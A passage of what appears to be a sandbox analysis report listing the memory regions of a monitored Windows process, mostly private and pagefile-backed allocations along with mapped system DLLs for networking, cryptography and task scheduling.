"" Region: id = 1537 start_va = 0x3ed0000 end_va = 0x3eebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 1538 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1539 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1540 start_va = 0x1e90000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 1541 start_va = 0x3ed0000 end_va = 0x3eebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 1542 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1543 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1544 start_va = 0x1e90000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 1545 start_va = 0x3ed0000 end_va = 0x3eebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 1546 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1547 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1548 start_va = 0x1e90000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 1549 start_va = 0x3ed0000 end_va = 0x3eebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 1550 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1551 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1552 start_va = 0x1e90000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 1553 start_va = 0x3ed0000 end_va = 0x3eebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 1554 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1555 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1556 start_va = 0x1e90000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 1557 start_va = 0x3ed0000 end_va = 0x3eebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 1558 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1559 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1560 start_va = 0x1e90000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 1561 start_va = 0x3ed0000 end_va = 0x3eebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 1562 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1563 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1564 start_va = 0x1e90000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 1565 start_va = 0x3ed0000 end_va = 0x3eebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 1566 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1567 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1568 start_va = 0x1e90000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 1569 start_va = 0x3ed0000 end_va = 0x3eebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 1570 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1571 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1572 start_va = 0x7ffa123a0000 end_va = 0x7ffa123d3fff monitored = 0 entry_point = 0x7ffa123bae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1573 start_va = 0x7ffa12830000 end_va = 0x7ffa1283afff monitored = 0 entry_point = 0x7ffa128319a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1574 start_va = 0x102f0000 end_va = 0x1036ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000102f0000" filename = "" Region: id = 1575 start_va = 0x1e90000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 1576 start_va = 0x3ed0000 end_va = 0x3eebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 1577 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1578 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1579 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1580 start_va = 0x7ffa0b700000 end_va = 0x7ffa0b79bfff monitored = 0 entry_point = 0x7ffa0b7596a0 region_type = mapped_file name = "efswrt.dll" filename = "\\Windows\\System32\\efswrt.dll" (normalized: "c:\\windows\\system32\\efswrt.dll") Region: id = 1581 start_va = 0x7ffa0fe10000 end_va = 0x7ffa0fecefff monitored = 0 entry_point = 0x7ffa0fe31c50 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 1582 start_va = 0x1e90000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 1583 start_va = 0x3ed0000 end_va = 0x3eebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 1584 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1585 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1586 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1587 start_va = 0x7ffa0f430000 end_va = 0x7ffa0f465fff monitored = 0 entry_point = 0x7ffa0f440070 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 1947 start_va = 0x1e90000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 1948 start_va = 0x3ed0000 end_va = 0x3eebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 1949 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1950 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1951 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1952 start_va = 0x4960000 end_va = 0x49c9fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cachedimage_1440_900_pos4.jpg" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\CachedImage_1440_900_POS4.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\windows\\themes\\cachedfiles\\cachedimage_1440_900_pos4.jpg") Region: id = 1953 start_va = 0x9870000 end_va = 0x9d61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009870000" filename = "" Region: id = 1954 start_va = 0x7ffa0b300000 end_va = 0x7ffa0b314fff monitored = 0 entry_point = 0x7ffa0b302dc0 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 1955 start_va = 0x7ff9fe1c0000 end_va = 0x7ff9fe23ffff monitored = 0 entry_point = 0x7ff9fe1ed280 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 1956 start_va = 0x7ffa12660000 end_va = 0x7ffa126bbfff monitored = 0 entry_point = 0x7ffa12676f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1957 start_va = 0x7ffa0b7a0000 end_va = 0x7ffa0b7aafff monitored = 0 entry_point = 0x7ffa0b7a1d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1958 start_va = 0x1e90000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 1959 start_va = 0x3ed0000 end_va = 0x3eebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 1960 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1961 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1962 start_va = 0x1e90000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 1963 start_va = 0x3ed0000 end_va = 0x3eebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 1964 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1965 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1966 start_va = 0x7ffa0ac50000 end_va = 0x7ffa0ac59fff monitored = 0 entry_point = 0x7ffa0ac514c0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1967 start_va = 0x7ffa0b640000 end_va = 0x7ffa0b6a6fff monitored = 0 entry_point = 0x7ffa0b6463e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1968 start_va = 0x1e90000 end_va = 0x1e92fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\System32\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mswsock.dll.mui") Region: id = 1969 start_va = 0x3d40000 end_va = 0x3d49fff monitored = 0 entry_point = 0x3d415c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 1970 start_va = 0x3ed0000 end_va = 0x3ed0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\System32\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshqos.dll.mui") Region: id = 1971 start_va = 0x3ee0000 end_va = 0x3eeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ee0000" filename = "" Region: id = 1972 start_va = 0x4960000 end_va = 0x497bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004960000" filename = "" Region: id = 1973 start_va = 0x3ee0000 end_va = 0x3eeefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ee0000" filename = "" Region: id = 1974 start_va = 0x3ee0000 end_va = 0x3eeefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ee0000" filename = "" Region: id = 1975 start_va = 0x3ee0000 end_va = 0x3eeefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ee0000" filename = "" Region: id = 1976 start_va = 0x3d40000 end_va = 0x3d49fff monitored = 0 entry_point = 0x3d415c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 1977 start_va = 0x3ed0000 end_va = 0x3ed0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\System32\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshqos.dll.mui") Region: id = 1978 start_va = 0x3d40000 end_va = 0x3d49fff monitored = 0 entry_point = 0x3d415c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 1979 start_va = 0x3ed0000 end_va = 0x3ed0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\System32\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshqos.dll.mui") Region: id = 1980 start_va = 0x3d40000 end_va = 0x3d49fff monitored = 0 entry_point = 0x3d415c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 1981 start_va = 0x3ed0000 end_va = 0x3ed0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\System32\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshqos.dll.mui") Region: id = 1982 start_va = 0x3d40000 end_va = 0x3d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d40000" filename = "" Region: id = 1983 start_va = 0x3ed0000 end_va = 0x3eebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 1984 start_va = 0x3d40000 end_va = 0x3d4efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003d40000" filename = "" Region: id = 1985 start_va = 0x3d40000 end_va = 0x3d4efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003d40000" filename = "" Region: id = 1986 start_va = 0x3d40000 end_va = 0x3d4efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003d40000" filename = "" Region: id = 1987 start_va = 0x3ed0000 end_va = 0x3ed0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 1988 start_va = 0x8a70000 end_va = 0x8b69fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008a70000" filename = "" Region: id = 1989 start_va = 0x3d40000 end_va = 0x3d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d40000" filename = "" Region: id = 1990 start_va = 0x4960000 end_va = 0x497bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004960000" filename = "" Region: id = 1991 start_va = 0x3d40000 end_va = 0x3d4efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003d40000" filename = "" Region: id = 1992 start_va = 0x3d40000 end_va = 0x3d4efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003d40000" filename = "" Region: id = 1993 start_va = 0x3d40000 end_va = 0x3d40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d40000" filename = "" Region: id = 1994 start_va = 0x7ffa122e0000 end_va = 0x7ffa12359fff monitored = 0 entry_point = 0x7ffa12301a50 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 1995 start_va = 0x3ee0000 end_va = 0x3eeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ee0000" filename = "" Region: id = 1996 start_va = 0x4960000 end_va = 0x497bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004960000" filename = "" Region: id = 1997 start_va = 0x3ee0000 end_va = 0x3eeefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ee0000" filename = "" Region: id = 1998 start_va = 0x3ee0000 end_va = 0x3eeefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ee0000" filename = "" Region: id = 1999 start_va = 0x3ee0000 end_va = 0x3eeefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ee0000" filename = "" Region: id = 2000 start_va = 0x4710000 end_va = 0x4711fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004710000" filename = "" Region: id = 2001 start_va = 0x7ffa01690000 end_va = 0x7ffa016a3fff monitored = 0 entry_point = 0x7ffa01693710 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 2002 start_va = 0x7ffa12900000 end_va = 0x7ffa12926fff monitored = 0 entry_point = 0x7ffa12910aa0 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 2003 start_va = 0x7ffa128c0000 end_va = 0x7ffa128f9fff monitored = 0 entry_point = 0x7ffa128c8d20 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 2004 start_va = 0x7ffa01740000 end_va = 0x7ffa0175dfff monitored = 0 entry_point = 0x7ffa0174ef80 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 2005 start_va = 0x4940000 end_va = 0x4949fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\System32\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\crypt32.dll.mui") Region: id = 2006 start_va = 0x3ee0000 end_va = 0x3eeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ee0000" filename = "" Region: id = 2007 start_va = 0x4960000 end_va = 0x497bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004960000" filename = "" Region: id = 2008 start_va = 0x3ee0000 end_va = 0x3eeefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ee0000" filename = "" Region: id = 2009 start_va = 0x3ee0000 end_va = 0x3eeefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ee0000" filename = "" Region: id = 2010 start_va = 0x3ee0000 end_va = 0x3eeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ee0000" filename = "" Region: id = 2011 start_va = 0x4960000 end_va = 0x497bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004960000" filename = "" Region: id = 2012 start_va = 0x3ee0000 end_va = 0x3eeefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ee0000" filename = "" Region: id = 2013 start_va = 0x3ee0000 end_va = 0x3eeefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ee0000" filename = "" Region: id = 2014 start_va = 0x3ee0000 end_va = 0x3eeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ee0000" filename = "" Region: id = 2015 start_va = 0x4960000 end_va = 0x497bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004960000" filename = "" Region: id = 2016 start_va = 0x3ee0000 end_va = 0x3eeefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ee0000" filename = "" Region: id = 2017 start_va = 0x3ee0000 end_va = 0x3eeefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ee0000" filename = "" Region: id = 2018 start_va = 0x8a70000 end_va = 0x8b6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008a70000" filename = "" Region: id = 2019 start_va = 0x4960000 end_va = 0x49c5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004960000" filename = "" Region: id = 2020 start_va = 0x3ee0000 end_va = 0x3eeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ee0000" filename = "" Region: id = 2021 start_va = 0x49d0000 end_va = 0x49ebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 2022 start_va = 0x4a30000 end_va = 0x4a3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a30000" filename = "" Region: id = 2023 start_va = 0x3ee0000 end_va = 0x3eeefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ee0000" filename = "" Region: id = 2024 start_va = 0x3ee0000 end_va = 0x3eeefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ee0000" filename = "" Region: id = 2025 start_va = 0x7df5ffb10000 end_va = 0x7df5ffeb0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 2056 start_va = 0x3ee0000 end_va = 0x3eeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ee0000" filename = "" Region: id = 2057 start_va = 0x49d0000 end_va = 0x49ebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 2058 start_va = 0x3ee0000 end_va = 0x3eeefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ee0000" filename = "" Region: id = 2059 start_va = 0x3ee0000 end_va = 0x3eeefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ee0000" filename = "" Region: id = 2073 start_va = 0x3ee0000 end_va = 0x3ee0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ee0000" filename = "" Region: id = 2074 start_va = 0x3d40000 end_va = 0x3d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d40000" filename = "" Region: id = 2075 start_va = 0x49d0000 end_va = 0x49ebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 2076 start_va = 0x3d40000 end_va = 0x3d4efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003d40000" filename = "" Region: id = 2077 start_va = 0x3d40000 end_va = 0x3d4efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003d40000" filename = "" Region: id = 2078 start_va = 0x49d0000 end_va = 0x49d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 2079 start_va = 0x3d40000 end_va = 0x3d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d40000" filename = "" Region: id = 2080 start_va = 0x49e0000 end_va = 0x49fbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049e0000" filename = "" Region: id = 2081 start_va = 0x3d40000 end_va = 0x3d4efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003d40000" filename = "" Region: id = 2082 start_va = 0x3d40000 end_va = 0x3d4efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003d40000" filename = "" Region: id = 2083 start_va = 0x3d40000 end_va = 0x3d40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d40000" filename = "" Region: id = 2084 start_va = 0x3ee0000 end_va = 0x3eeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ee0000" filename = "" Region: id = 2085 start_va = 0x49e0000 end_va = 0x49fbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049e0000" filename = "" Region: id = 2086 start_va = 0x3ee0000 end_va = 0x3eeefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ee0000" filename = "" Region: id = 2087 start_va = 0x3ee0000 end_va = 0x3eeefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ee0000" filename = "" Region: id = 2088 start_va = 0x3ee0000 end_va = 0x3ee0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ee0000" filename = "" Region: id = 2089 start_va = 0x3ed0000 end_va = 0x3edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 2090 start_va = 0x49e0000 end_va = 0x49fbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049e0000" filename = "" Region: id = 2091 start_va = 0x3ed0000 end_va = 0x3edefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ed0000" filename = "" Region: id = 2092 start_va = 0x3ed0000 end_va = 0x3edefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ed0000" filename = "" Region: id = 2093 start_va = 0x3ed0000 end_va = 0x3edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 2094 start_va = 0x49e0000 end_va = 0x49fbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049e0000" filename = "" Region: id = 2095 start_va = 0x3ed0000 end_va = 0x3edefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ed0000" filename = "" Region: id = 2096 start_va = 0x3ed0000 end_va = 0x3edefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ed0000" filename = "" Region: id = 2097 start_va = 0x3ed0000 end_va = 0x3edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 2098 start_va = 0x49e0000 end_va = 0x49fbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049e0000" filename = "" Region: id = 2099 start_va = 0x3ed0000 end_va = 0x3edefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ed0000" filename = "" Region: id = 2100 start_va = 0x3ed0000 end_va = 0x3edefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ed0000" filename = "" Region: id = 2101 start_va = 0x3ed0000 end_va = 0x3edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 2102 start_va = 0x49d0000 end_va = 0x49ebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 2103 start_va = 0x3ed0000 end_va = 0x3edefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ed0000" filename = "" Region: id = 2104 start_va = 0x3ed0000 end_va = 0x3edefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ed0000" filename = "" Region: id = 2105 start_va = 